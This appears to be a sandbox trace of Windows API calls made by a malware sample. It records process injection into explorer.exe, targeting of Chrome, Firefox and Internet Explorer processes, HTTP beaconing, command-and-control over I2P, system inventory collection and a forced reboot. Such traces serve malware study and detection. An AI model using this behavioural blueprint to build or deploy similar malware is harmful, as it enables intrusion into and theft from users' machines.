    • GetLastError.KERNEL32(?,?,?,00EF7AD8,00000000), ref: 00EF9B92
    • GetLastError.KERNEL32(?,?,?,00EF7AD8,00000000), ref: 00EF9B98
    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000008), ref: 00EF9BB2
    • CryptImportKey.ADVAPI32(00000000,00000000,00EF7AD8,00000000,00000000,00EF7AD8), ref: 00EF9BCD
    • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,00000000), ref: 00EF9BE8
    • CryptHashData.ADVAPI32(00000000,?,00000000,00000000), ref: 00EF9BFA
    • CryptVerifySignatureW.ADVAPI32(00000000,?,?,00EF7AD8,00000000,00000000,?,?,?,00EF7AD8,00000000), ref: 00EF9C12
    • CryptDestroyHash.ADVAPI32(00000000), ref: 00EF9C1D
    • CryptDestroyKey.ADVAPI32(00EF7AD8), ref: 00EF9C26
    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00EF9C30
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EF5632
    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00EF5642
    • lstrcmpiW.KERNEL32(0294FCC4,explorer.exe), ref: 00EF565C
    • OpenProcess.KERNEL32(00000400,00000000,00003672), ref: 00EF5672
    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00EF5684
    • CloseHandle.KERNEL32(00000000), ref: 00EF5697
    • CloseHandle.KERNEL32(00000000), ref: 00EF569F
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • lstrlenW.KERNEL32(000DA910), ref: 00EF574F
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • CreateEnvironmentBlock.USERENV(0294FEBC,00000000,00000000), ref: 00EF57DB
    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000420,FD99905B,00000000,00000044,00000000), ref: 00EF57FA
    • CloseHandle.KERNEL32(00000000), ref: 00EF5825
    • CloseHandle.KERNEL32(00000000), ref: 00EF582A
    • DestroyEnvironmentBlock.USERENV(FD99905B), ref: 00EF5836
    APIs
    • StrStrIW.SHLWAPI(?,chrome.exe), ref: 00EFD9B1
    • StrStrIW.SHLWAPI(?,firefox.exe), ref: 00EFD9BF
    • StrStrIW.SHLWAPI(?,iexplore.exe), ref: 00EFD9CD
      • Part of subcall function 00EFD54B: EnterCriticalSection.KERNEL32(-00000031,00EFDD09,00000000,00000000), ref: 00EFD54F
      • Part of subcall function 00EFD559: LeaveCriticalSection.KERNEL32(-00000031,00EFDD78,0000960D,0294FF08,00000000,00000000), ref: 00EFD55D
      • Part of subcall function 00EFD8E7: OpenProcess.KERNEL32(0000043A,00000000,?), ref: 00EFD904
      • Part of subcall function 00EFD8E7: CloseHandle.KERNEL32(00000000), ref: 00EFD921
    APIs
      • Part of subcall function 00EF5308: GetCurrentProcess.KERNEL32 ref: 00EF5317
      • Part of subcall function 00EF5308: OpenProcessToken.ADVAPI32(00000000), ref: 00EF531E
      • Part of subcall function 00EF5308: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00EF5339
      • Part of subcall function 00EF5308: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 00EF5356
      • Part of subcall function 00EF5308: CloseHandle.KERNEL32(?), ref: 00EF5361
    • ShellExecuteW.SHELL32(00000000,open,C:\windows\system32\shutdown.exe,/r /f /t 1,00000000,00000000), ref: 00EF5A3E
    APIs
    • GetLocalTime.KERNEL32(?), ref: 00EF54A7
      • Part of subcall function 00EF544B: GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00EF546B
      • Part of subcall function 00EF544B: GetProcAddress.KERNEL32(00000000), ref: 00EF5472
      • Part of subcall function 00EF544B: SystemTimeToFileTime.KERNEL32(?,?), ref: 00EF5484
    APIs
    • WSACreateEvent.WS2_32 ref: 00EF2771
    • WSAEventSelect.WS2_32(?,?,00000023), ref: 00EF2789
    • WSAWaitForMultipleEvents.WS2_32(00000003,?,00000000,00001388,00000000), ref: 00EF2822
    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00EF284A
    • WSASend.WS2_32(?,?,00000001,?,00000000,00000000,00000000), ref: 00EF288B
    • WSAGetLastError.WS2_32 ref: 00EF28AA
    • GetTickCount.KERNEL32 ref: 00EF28BB
    • WSARecv.WS2_32(?,?,00000001,?,?,00000000,00000000), ref: 00EF2936
    • WSARecv.WS2_32(?,?,00000001,?,?,00000000,00000000), ref: 00EF2987
    • GetTickCount.KERNEL32 ref: 00EF2998
    • WSAGetLastError.WS2_32 ref: 00EF29C1
      • Part of subcall function 00EF1C5B: EnterCriticalSection.KERNEL32(?), ref: 00EF1C69
      • Part of subcall function 00EF1C5B: LeaveCriticalSection.KERNEL32(?), ref: 00EF1CA6
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00EF2A76
      • Part of subcall function 00EF1BDA: EnterCriticalSection.KERNEL32(?), ref: 00EF1BE5
      • Part of subcall function 00EF1BDA: LeaveCriticalSection.KERNEL32(?,00000000), ref: 00EF1C10
      • Part of subcall function 00EF24B8: EnterCriticalSection.KERNEL32(?,?,00EF23AA,?,?,?), ref: 00EF24BC
      • Part of subcall function 00EF24B8: SetEvent.KERNEL32(?), ref: 00EF250E
      • Part of subcall function 00EF24B8: LeaveCriticalSection.KERNEL32(?), ref: 00EF258A
    • CreateThread.KERNEL32(00000000,00000000,00EF2D66,00000000), ref: 00EF2AEF
    • CloseHandle.KERNEL32(00000000), ref: 00EF2AF6
    • ResetEvent.KERNEL32(?), ref: 00EF2BBA
      • Part of subcall function 00EF2618: EnterCriticalSection.KERNEL32(?,00000000,00EF2323), ref: 00EF261D
      • Part of subcall function 00EF2618: ResetEvent.KERNEL32(?), ref: 00EF2632
      • Part of subcall function 00EF2618: LeaveCriticalSection.KERNEL32(?), ref: 00EF263B
      • Part of subcall function 00EF2594: EnterCriticalSection.KERNEL32(?,00000000,?,00EF2337,?), ref: 00EF259B
      • Part of subcall function 00EF2594: ResetEvent.KERNEL32(?), ref: 00EF25B0
      • Part of subcall function 00EF2594: LeaveCriticalSection.KERNEL32(?,?,00EF2337,?), ref: 00EF25B9
    • WSASend.WS2_32(?,?,00000001,?,00000000,00000000,00000000), ref: 00EF2C20
    • GetTickCount.KERNEL32 ref: 00EF2C41
    • WSAGetLastError.WS2_32 ref: 00EF2C65
    • WSAGetLastError.WS2_32 ref: 00EF2C7F
      • Part of subcall function 00EF1D2A: EnterCriticalSection.KERNEL32(?,00EF1CE3), ref: 00EF1D2E
    • SetEvent.KERNEL32(?), ref: 00EF2CB5
      • Part of subcall function 00EF1D38: LeaveCriticalSection.KERNEL32(?,00EF1D25), ref: 00EF1D3C
    • Sleep.KERNEL32(00000010), ref: 00EF2CD6
    • WSACloseEvent.WS2_32(?), ref: 00EF2CFA
    • shutdown.WS2_32(?,00000002), ref: 00EF2D0A
    • closesocket.WS2_32(?), ref: 00EF2D14
    • shutdown.WS2_32(?,00000002), ref: 00EF2D1B
    • closesocket.WS2_32(?), ref: 00EF2D20
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
      • Part of subcall function 00EF247D: DeleteCriticalSection.KERNEL32(?,71AC0BF6,00EF2D3C), ref: 00EF247F
      • Part of subcall function 00EF247D: CloseHandle.KERNEL32(?), ref: 00EF2488
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF240E: InitializeCriticalSection.KERNEL32 ref: 00EF241D
      • Part of subcall function 00EF240E: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00EF2428
      • Part of subcall function 00EF1B7D: InitializeCriticalSection.KERNEL32(00000018), ref: 00EF1B8F
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • WSACreateEvent.WS2_32 ref: 00EF201D
    • WSAGetLastError.WS2_32 ref: 00EF202C
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • WSAEventSelect.WS2_32(?,?,00000023), ref: 00EF209A
    • WSASend.WS2_32(?,?,00000001,?,00000000,00000000,00000000), ref: 00EF2164
    • WSAGetLastError.WS2_32 ref: 00EF2198
    • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,00000BB8,00000001), ref: 00EF21C7
    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00EF21F7
    • WSASend.WS2_32(?,?,00000001,?,00000000,00000000,00000000), ref: 00EF224B
    • WSAGetLastError.WS2_32 ref: 00EF2283
    • WSARecv.WS2_32(?,?,00000001,?,?,00000000,00000000), ref: 00EF22C4
      • Part of subcall function 00EF2618: EnterCriticalSection.KERNEL32(?,00000000,00EF2323), ref: 00EF261D
      • Part of subcall function 00EF2618: ResetEvent.KERNEL32(?), ref: 00EF2632
      • Part of subcall function 00EF2618: LeaveCriticalSection.KERNEL32(?), ref: 00EF263B
      • Part of subcall function 00EF2594: EnterCriticalSection.KERNEL32(?,00000000,?,00EF2337,?), ref: 00EF259B
      • Part of subcall function 00EF2594: ResetEvent.KERNEL32(?), ref: 00EF25B0
      • Part of subcall function 00EF2594: LeaveCriticalSection.KERNEL32(?,?,00EF2337,?), ref: 00EF25B9
    • WSAGetLastError.WS2_32 ref: 00EF2377
      • Part of subcall function 00EF24B8: EnterCriticalSection.KERNEL32(?,?,00EF23AA,?,?,?), ref: 00EF24BC
      • Part of subcall function 00EF24B8: SetEvent.KERNEL32(?), ref: 00EF250E
      • Part of subcall function 00EF24B8: LeaveCriticalSection.KERNEL32(?), ref: 00EF258A
    • shutdown.WS2_32(?,00000000), ref: 00EF23AE
    • closesocket.WS2_32(?), ref: 00EF23B7
    • WSACloseEvent.WS2_32(?), ref: 00EF23C9
    APIs
      • Part of subcall function 00EF62BD: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00EF62CE
      • Part of subcall function 00EF62BD: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EF62EE
      • Part of subcall function 00EF62BD: GetLastError.KERNEL32(?,?), ref: 00EF62FB
      • Part of subcall function 00EF62BD: InternetCloseHandle.WININET(?), ref: 00EF6306
      • Part of subcall function 00EF62BD: SetLastError.KERNEL32(00000000,?,?), ref: 00EF630D
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
      • Part of subcall function 00EF61F3: HttpSendRequestExW.WININET(?,?,00000000,00000000,00000000), ref: 00EF622C
      • Part of subcall function 00EF61F3: InternetWriteFile.WININET(?,?,00000400,00000000), ref: 00EF6267
      • Part of subcall function 00EF61F3: HttpEndRequestW.WININET(?,00000000,00000000,00000000), ref: 00EF6283
    • GetLastError.KERNEL32(?), ref: 00EF634E
    • HttpOpenRequestA.WININET(?,POST,?,00000000,00000000,00000000,04803000,00000000), ref: 00EF63A1
    • InternetCloseHandle.WININET(?), ref: 00EF6509
      • Part of subcall function 00EF5F26: InternetQueryOptionW.WININET(?,0000001F,?,?), ref: 00EF5F3F
      • Part of subcall function 00EF5F26: InternetSetOptionW.WININET(00000004,0000001F,00000380,00000004), ref: 00EF5F57
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF6180: wsprintfA.USER32(?,00EFE4E4,?,00001000,Content-Length: ,00000000,00000000,?), ref: 00EF61CE
    • GetLastError.KERNEL32(?,?), ref: 00EF63E4
    • lstrlenA.KERNEL32(00000000,20000000,?,?,?), ref: 00EF63F5
    • HttpAddRequestHeadersA.WININET(?,00000000,00000000), ref: 00EF6400
    • GetLastError.KERNEL32(?,?,?), ref: 00EF640A
    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00EF643D
    • InternetCloseHandle.WININET(?), ref: 00EF6446
    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00EF645D
    • InternetReadFile.WININET(?,00000000,?,?), ref: 00EF6483
    • InternetReadFile.WININET(?,?,?,?), ref: 00EF64B1
    • HttpQueryInfoW.WININET(?,00000013,?,?,00000000), ref: 00EF64E9
    • StrToIntW.SHLWAPI(?), ref: 00EF64FA
    APIs
    • GetVersionExW.KERNEL32(?), ref: 00EF3EFA
    • wsprintfA.USER32(00000000,/%s/%s/0/%s/%d/%s/,?,0000001F,?,00000451,?), ref: 00EF3FCA
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
      • Part of subcall function 00EF5165: QueryPerformanceCounter.KERNEL32(00000000), ref: 00EF516E
    • InitializeCriticalSection.KERNEL32(00F03834), ref: 00EFDAA1
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • DeleteCriticalSection.KERNEL32(00F03834,?,00EFD460,00F03688,?,?), ref: 00EFDAB9
    • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00EFDBD8
    • GetProcAddress.KERNEL32(00000000), ref: 00EFDBE1
    • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00EFDBF2
    • GetProcAddress.KERNEL32(00000000), ref: 00EFDBF5
    • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00EFDC06
    • GetProcAddress.KERNEL32(00000000), ref: 00EFDC09
    • GetCurrentProcessId.KERNEL32 ref: 00EFDC10
    APIs
      • Part of subcall function 00EF62BD: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00EF62CE
      • Part of subcall function 00EF62BD: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EF62EE
      • Part of subcall function 00EF62BD: GetLastError.KERNEL32(?,?), ref: 00EF62FB
      • Part of subcall function 00EF62BD: InternetCloseHandle.WININET(?), ref: 00EF6306
      • Part of subcall function 00EF62BD: SetLastError.KERNEL32(00000000,?,?), ref: 00EF630D
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • GetLastError.KERNEL32(?,?), ref: 00EF669F
    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,00000000,04803000,00000000), ref: 00EF66EF
    • StrToIntW.SHLWAPI(?), ref: 00EF67E0
      • Part of subcall function 00EF5F26: InternetQueryOptionW.WININET(?,0000001F,?,?), ref: 00EF5F3F
      • Part of subcall function 00EF5F26: InternetSetOptionW.WININET(00000004,0000001F,00000380,00000004), ref: 00EF5F57
    • HttpSendRequestA.WININET(?,00000000,00000000,00000000,00000000), ref: 00EF6712
    • GetLastError.KERNEL32(?,?), ref: 00EF671C
    • InternetCloseHandle.WININET(?), ref: 00EF6727
    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00EF6740
    • InternetCloseHandle.WININET(?), ref: 00EF67EF
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • InternetReadFile.WININET(?,00000000,?,?), ref: 00EF6768
    • InternetReadFile.WININET(?,?,?,?), ref: 00EF6797
    • HttpQueryInfoW.WININET(?,00000013,?,?,00000000), ref: 00EF67CF
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • lstrcmpA.KERNEL32(?,btid), ref: 00EF73BC
    • lstrcmpA.KERNEL32(?,ccsr), ref: 00EF73DB
    • lstrcmpA.KERNEL32(?,dpsr), ref: 00EF73FA
    • lstrcmpA.KERNEL32(?,btnt), ref: 00EF7419
    • lstrcmpA.KERNEL32(?,slip), ref: 00EF7478
      • Part of subcall function 00EF78E0: lstrlenA.KERNEL32(?,7C830D7C,?,?,00EF7489,?), ref: 00EF78EC
      • Part of subcall function 00EF789C: lstrlenA.KERNEL32(?,7C830D7C,?,?,00EF740E,?,?), ref: 00EF78A8
      • Part of subcall function 00EF785B: lstrlenA.KERNEL32(?,7C830D7C,?,?,00EF73EF,?,?), ref: 00EF7864
      • Part of subcall function 00EF72EB: lstrlenA.KERNEL32(0290AFF4,00F032D0,?,0294FFB4,00EFCFBF,377142_W512600.2A0325090A052E27ABA25890C72BFBD1,00000200), ref: 00EF72F7
    • lstrlenA.KERNEL32(?,?,success), ref: 00EF75DF
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF7374: lstrlenA.KERNEL32 ref: 00EF737A
    APIs
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
      • Part of subcall function 00EFB6B2: RegOpenKeyW.ADVAPI32(?,?,?), ref: 00EFB6C3
      • Part of subcall function 00EFB6B2: RegCloseKey.ADVAPI32(?), ref: 00EFB714
    • lstrlenW.KERNEL32(==General==), ref: 00EFC0F0
      • Part of subcall function 00EFC076: lstrcpyW.KERNEL32(00000000,no CPU info), ref: 00EFC08B
    • lstrlenW.KERNEL32(00000000), ref: 00EFC10E
    • lstrlenW.KERNEL32(==Users==), ref: 00EFC137
      • Part of subcall function 00EFC095: lstrcpyW.KERNEL32(00000000,no users info), ref: 00EFC0AA
    • lstrlenW.KERNEL32(00000000), ref: 00EFC156
      • Part of subcall function 00EFB5D0: lstrlenW.KERNEL32 ref: 00EFB5F2
      • Part of subcall function 00EFB5D0: lstrlenW.KERNEL32(DisplayName), ref: 00EFB629
    • lstrlenW.KERNEL32(==Programs==), ref: 00EFC1A4
    • lstrlenW.KERNEL32(==Services==), ref: 00EFC1EA
    APIs
    • CreateFileW.KERNEL32(\\.\pipe\2f1e5f214354r,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00EF69D7
    • Sleep.KERNEL32(00000032), ref: 00EF69E9
    • WriteFile.KERNEL32(00000000,00026538,00000114,0294FE98,00000000), ref: 00EF6A09
    • CloseHandle.KERNEL32(00000000), ref: 00EF6A14
    • GetTickCount.KERNEL32 ref: 00EF6A28
    • GetTickCount.KERNEL32 ref: 00EF6A34
    • Sleep.KERNEL32(00000010), ref: 00EF6A42
    • ReadFile.KERNEL32(0294FED4,FFFECD63,00000400,0294FEA4,00000000), ref: 00EF6A54
    • CloseHandle.KERNEL32(0294FED4), ref: 00EF6A65
    APIs
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000000), ref: 00EF1D63
    • inet_addr.WS2_32(?), ref: 00EF1D7D
    • htons.WS2_32(?), ref: 00EF1D8B
    • WSAConnect.WS2_32(?,?,00000010,00000000,00000000,00000000,00000000), ref: 00EF1DA2
    • CreateThread.KERNEL32(00000000,00000000,00EF273A,00000000), ref: 00EF1DD2
    • SetThreadPriority.KERNEL32(00000000,00000002), ref: 00EF1DE2
    • WSASend.WS2_32(00000000,?,00000001,?,00000000,00000000,00000000), ref: 00EF1E1B
    • WSAGetLastError.WS2_32 ref: 00EF1E26
    • TerminateThread.KERNEL32(?,00000000), ref: 00EF1E37
    • shutdown.WS2_32(?,00000002), ref: 00EF1E45
    • closesocket.WS2_32(?), ref: 00EF1E4E
    APIs
    • WSASend.WS2_32(0000054F,?,00000001,?,00000000,00000000,00000000), ref: 00EF1064
    • GetTickCount.KERNEL32 ref: 00EF107F
    • WSAWaitForMultipleEvents.WS2_32(00000002,?,00000000,00003A98,00000000,?,?,7C80934A), ref: 00EF109E
    • WSAEnumNetworkEvents.WS2_32(0000054F,00000001,?), ref: 00EF10D0
    • WSARecv.WS2_32(0000054F,?,00000001,?,?,00000000,00000000), ref: 00EF110C
    • WaitForSingleObject.KERNEL32(?,00000010), ref: 00EF1162
    • WSAGetLastError.WS2_32(?,?,7C80934A), ref: 00EF1198
    • WSAGetLastError.WS2_32(?,?,7C80934A), ref: 00EF11AE
    APIs
    • lstrcmpA.KERNEL32(?,AUTOBACKCONN), ref: 00EFC9CF
    • lstrcmpA.KERNEL32(?,I2P_EVENT), ref: 00EFCA18
    • lstrcmpA.KERNEL32(?,I2P_NODESTAT), ref: 00EFCA39
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00000000,00000000,00000000,00F032D0,0294FF38,00EFC3DC,02908008,m_i2p32,0294FF1C), ref: 00EF389B
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00F03560), ref: 00EF38A2
      • Part of subcall function 00EF388A: wsprintfA.USER32(00000000,%s/%s/0,00000000,00F03560), ref: 00EF38C1
      • Part of subcall function 00EFBDCF: CreateThread.KERNEL32(00000000,00000000,?,?), ref: 00EFBDE7
      • Part of subcall function 00EFBDCF: CloseHandle.KERNEL32(00000000), ref: 00EFBDF2
    APIs
    • InternetOpenA.WININET(00EFE2C0,00000000,00000000,00000000,00000000), ref: 00EFB452
    • InternetOpenUrlA.WININET(00000000,http://icanhazip.com,00000000,00000000,00000000,00000000), ref: 00EFB46D
    • InternetReadFile.WININET(00000000,0294FAE4,00000418,0294FF10), ref: 00EFB4A3
    • inet_addr.WS2_32(0294FAE4), ref: 00EFB4CA
    • InternetCloseHandle.WININET(00000000), ref: 00EFB504
    • InternetCloseHandle.WININET(00000000), ref: 00EFB50D
    APIs
    • lstrlenA.KERNEL32(A5AE484D,02908008,00000000), ref: 00EF3474
    • lstrcmpiA.KERNEL32(?,.b32.i2p:443), ref: 00EF348D
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00000000,00000000,00000000,00F032D0,0294FF38,00EFC3DC,02908008,m_i2p32,0294FF1C), ref: 00EF389B
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00F03560), ref: 00EF38A2
      • Part of subcall function 00EF388A: wsprintfA.USER32(00000000,%s/%s/0,00000000,00F03560), ref: 00EF38C1
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    APIs
    • socket.WS2_32(00000002,00000001,00000006), ref: 00EF19CB
    • WSAConnect.WS2_32(000000FF,?,00000010,00000000,00000000,00000000,00000000), ref: 00EF1A1A
    • closesocket.WS2_32(000000FF), ref: 00EF1A28
    • getsockname.WS2_32(000000FF,?,?), ref: 00EF1A62
    • socket.WS2_32(00000002,00000001,00000006), ref: 00EF1A8C
      • Part of subcall function 00EF5959: MultiByteToWideChar.KERNEL32(00000000,00000000,00EF1AEE,000000FF,?,00000100), ref: 00EF5978
    • WSAConnect.WS2_32(000000FF,?,00000010,00000000,00000000,00000000,00000000), ref: 00EF1B15
    • getsockname.WS2_32(000000FF,?,?), ref: 00EF1B4B
    APIs
      • Part of subcall function 00EFD6A8: CreateFileMappingW.KERNEL32(000000FF,00000000,00000040,00000000,000DA910,00000000), ref: 00EFD6B8
      • Part of subcall function 00EFD6A8: MapViewOfFile.KERNEL32(00000000,0000000E,00000000,00000000,00000000), ref: 00EFD6CA
      • Part of subcall function 00EFD6A8: UnmapViewOfFile.KERNEL32(00000000), ref: 00EFD6F5
      • Part of subcall function 00EFD6A8: CloseHandle.KERNEL32(0000960D), ref: 00EFD6FD
      • Part of subcall function 00EF5165: QueryPerformanceCounter.KERNEL32(00000000), ref: 00EF516E
    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EFD7F5
    • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0294FEE8,0294FEE8), ref: 00EFD817
    • Sleep.KERNEL32(00000010), ref: 00EFD827
      • Part of subcall function 00EFD72D: lstrcmpA.KERNEL32(00000000,GetProcAddress,00000000,00000000,00EFD84D), ref: 00EFD741
    • FlushInstructionCache.KERNEL32(00000000,00000000,00EFB303), ref: 00EFD856
    • WaitForSingleObject.KERNEL32(0000960D,00001964), ref: 00EFD86B
    • TerminateThread.KERNEL32(0000960D,00000000), ref: 00EFD87A
      • Part of subcall function 00EFD70A: UnmapViewOfFile.KERNEL32(00000000), ref: 00EFD710
      • Part of subcall function 00EFD70A: NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 00EFD71C
      • Part of subcall function 00EFD70A: CloseHandle.KERNEL32(00000000), ref: 00EFD725
    • CloseHandle.KERNEL32(0000960D), ref: 00EFD89B
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • GetTickCount.KERNEL32 ref: 00EFC410
    • Sleep.KERNEL32(00000BB8), ref: 00EFC42E
    • GetTickCount.KERNEL32 ref: 00EFC46F
      • Part of subcall function 00EF1816: lstrcpyA.KERNEL32(?,?,00000000,?,7C80934A), ref: 00EF17A2
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00000000,00000000,00000000,00F032D0,0294FF38,00EFC3DC,02908008,m_i2p32,0294FF1C), ref: 00EF389B
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00F03560), ref: 00EF38A2
      • Part of subcall function 00EF388A: wsprintfA.USER32(00000000,%s/%s/0,00000000,00F03560), ref: 00EF38C1
    APIs
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • lstrlenA.KERNEL32(?,?,?,?,?,00EF17DA,?,?,?,?,?,?,?,000026AC), ref: 00EF15AE
    • CreateEventA.KERNEL32(00000000,00000001,00000000,00EFE2C0), ref: 00EF15DA
    • CreateThread.KERNEL32(00000000,00000000,00EF11C5,00000000), ref: 00EF1638
    • CloseHandle.KERNEL32(?), ref: 00EF1645
    • CloseHandle.KERNEL32(00000000), ref: 00EF1650
    APIs
      • Part of subcall function 00EFBE53: GetTickCount.KERNEL32 ref: 00EFBE61
      • Part of subcall function 00EFBE53: GetTickCount.KERNEL32 ref: 00EFBF04
    • GetTickCount.KERNEL32 ref: 00EFCE3C
      • Part of subcall function 00EF528E: GetCurrentProcess.KERNEL32 ref: 00EF5294
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000200,00000000,00000000), ref: 00EFCE75
      • Part of subcall function 00EFC287: CreateThread.KERNEL32(00000000,00000000,Function_0000C25F), ref: 00EFC2AC
      • Part of subcall function 00EFC287: CloseHandle.KERNEL32(00000000), ref: 00EFC2B9
      • Part of subcall function 00EFBF16: GetTickCount.KERNEL32 ref: 00EFBF35
      • Part of subcall function 00EFBF16: GetTickCount.KERNEL32 ref: 00EFBF85
      • Part of subcall function 00EFC2CA: GetVersionExW.KERNEL32(0294FE00), ref: 00EFC2E9
      • Part of subcall function 00EFC2CA: wsprintfA.USER32(0294FF1C,00EFE4E4,?), ref: 00EFC3BF
      • Part of subcall function 00EF4E22: lstrlenA.KERNEL32(?,?), ref: 00EF4E3B
      • Part of subcall function 00EF4E22: lstrlenA.KERNEL32(?), ref: 00EF4E42
      • Part of subcall function 00EF4E22: wsprintfA.USER32(00000000,%s/%s/0,?,?), ref: 00EF4E61
      • Part of subcall function 00EFBDCF: CreateThread.KERNEL32(00000000,00000000,?,?), ref: 00EFBDE7
